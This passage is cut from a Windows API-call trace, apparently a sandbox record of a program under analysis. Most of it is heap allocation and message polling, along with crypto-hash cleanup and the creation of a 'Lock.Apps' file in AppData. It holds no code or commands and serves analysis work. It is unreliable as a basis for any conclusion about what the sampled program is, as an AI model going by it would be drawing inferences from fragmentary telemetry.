dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0208.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e10 [0208.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0208.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0208.348] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0208.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0208.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0208.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.348] CryptDestroyHash (hHash=0xaa59a0) returned 1 [0208.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0208.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0208.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0208.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0208.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0208.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0208.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0208.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0208.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.351] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0208.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0208.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0208.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0208.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0208.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0208.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0208.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0208.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0208.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0208.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0208.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0208.355] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.355] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.355] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.355] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0208.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0208.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Apps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0208.356] GetLastError () returned 0x5 [0208.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0208.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.356] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0208.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0208.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0208.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Apps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.apps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2bc [0208.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0208.357] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.357] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.357] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0208.357] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0208.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0208.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0208.358] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.358] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0208.358] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0208.359] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0208.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 